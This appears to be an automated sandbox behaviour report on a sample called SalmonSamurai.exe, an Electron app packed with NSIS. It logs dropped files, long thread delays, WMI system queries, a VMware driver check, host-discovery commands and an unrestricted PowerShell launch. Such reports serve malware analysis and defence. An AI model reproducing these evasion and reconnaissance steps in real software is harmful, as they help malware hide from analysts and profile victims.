Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe File opened / queried: C:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6064
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4537
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 650
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 495
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 983
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2531
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 564
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 567
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 846
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 769
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7428
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1422
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6735
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2876
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1530
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1088
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1459
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1450
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 880
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1737
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 930
Source: C:\Users\user\Desktop\SalmonSamurai.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\NsisExtracted\resources\elevate.exe
Source: C:\Users\user\Desktop\SalmonSamurai.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\NsisExtracted\libGLESv2.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\NsisExtracted\vulkan-1.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\NsisExtracted\libEGL.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\NsisExtracted\vk_swiftshader.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1432 Thread sleep count: 5580 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1432 Thread sleep count: 213 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6480 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7108 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3512 Thread sleep count: 6064 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2692 Thread sleep count: 339 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7068 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3064 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5808 Thread sleep count: 4537 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5956 Thread sleep count: 237 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7044 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4420 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2304 Thread sleep count: 650 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6380 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6832 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4520 Thread sleep count: 495 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5376 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5964 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7108 Thread sleep count: 983 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4324 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5472 Thread sleep count: 168 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2368 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3608 Thread sleep count: 2531 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5428 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3512 Thread sleep count: 564 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6480 Thread sleep count: 567 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6528 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3864 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6964 Thread sleep count: 846 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1276 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6016 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7032 Thread sleep count: 769 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4564 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4124 Thread sleep count: 7428 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4124 Thread sleep count: 1422 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5548 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4136 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6788 Thread sleep count: 6735 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6896 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6784 Thread sleep count: 2876 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6640 Thread sleep count: 1530 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3484 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3684 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7108 Thread sleep count: 1088 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5952 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3864 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 884 Thread sleep count: 1459 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 928 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5644 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5652 Thread sleep count: 1450 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6888 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6916 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2476 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4460 Thread sleep count: 1737 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6856 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6984 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5496 Thread sleep count: 930 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3608 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystemProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe File opened: C:\Users\user\AppData\Roaming\NsisExtracted
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe File opened: C:\Users\user\AppData\Roaming\NsisExtracted\resources\app.asar
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe File opened: C:\Users\user\AppData\Roaming\NsisExtracted\resources
Source: SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: VMware Fusion 4 has corrupt rendering with Win Vista+
Source: SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: VMware can crash with older drivers and WebGL content
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "chcp"
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1836 --field-trial-handle=1840,i,2950987413084556284,14321838366694710053,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --mojo-platform-channel-handle=2072 --field-trial-handle=1840,i,2950987413084556284,14321838366694710053,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "c:\users\user\appdata\roaming\nsisextracted\salmonsamurai.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\jwsvgxfvwjmqrcpj" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaabgaaaaaaaaagaaaaaaaaaaiaaaaaaaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1836 --field-trial-handle=1840,i,2950987413084556284,14321838366694710053,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "c:\users\user\appdata\roaming\nsisextracted\salmonsamurai.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\jwsvgxfvwjmqrcpj" --mojo-platform-channel-handle=2072 --field-trial-handle=1840,i,2950987413084556284,14321838366694710053,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: ..\..\electron\shell\browser\ui\views\electron_views_delegate_win.ccGetAppbarAutohideEdgesShell_TrayWnd
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Queries volume information: C:\Users VolumeInformation
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Queries volume information: C:\Users\user\AppData VolumeInformation
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Queries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
